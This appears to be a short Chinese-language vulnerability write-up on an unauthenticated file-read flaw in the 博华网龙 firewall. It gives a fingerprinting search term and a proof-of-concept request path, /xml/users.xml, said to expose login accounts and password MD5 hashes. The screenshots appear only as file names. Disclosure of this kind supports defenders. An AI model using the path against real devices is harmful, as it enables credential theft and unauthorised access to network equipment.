博华网龙防火墙 users.xml 未授权访问

漏洞描述

博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码。

漏洞影响

博华网龙防火墙

网络测绘

“博华网龙防火墙”

漏洞复现

登录页面

20240327105938693-1628670749851-c85b5406-15f0-498c-9edd-80b1eb2ac426.a3db0b42_2024-03-27_10-58-27 (1)

验证POC, 读取配置文件获取密码的Md5

/xml/users.xml

20240327110041928-1628670712797-5caf4c4d-716b-4aa4-9468-d1ff8c433b66.4d56d6a6_2024-03-27_11-00-11 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容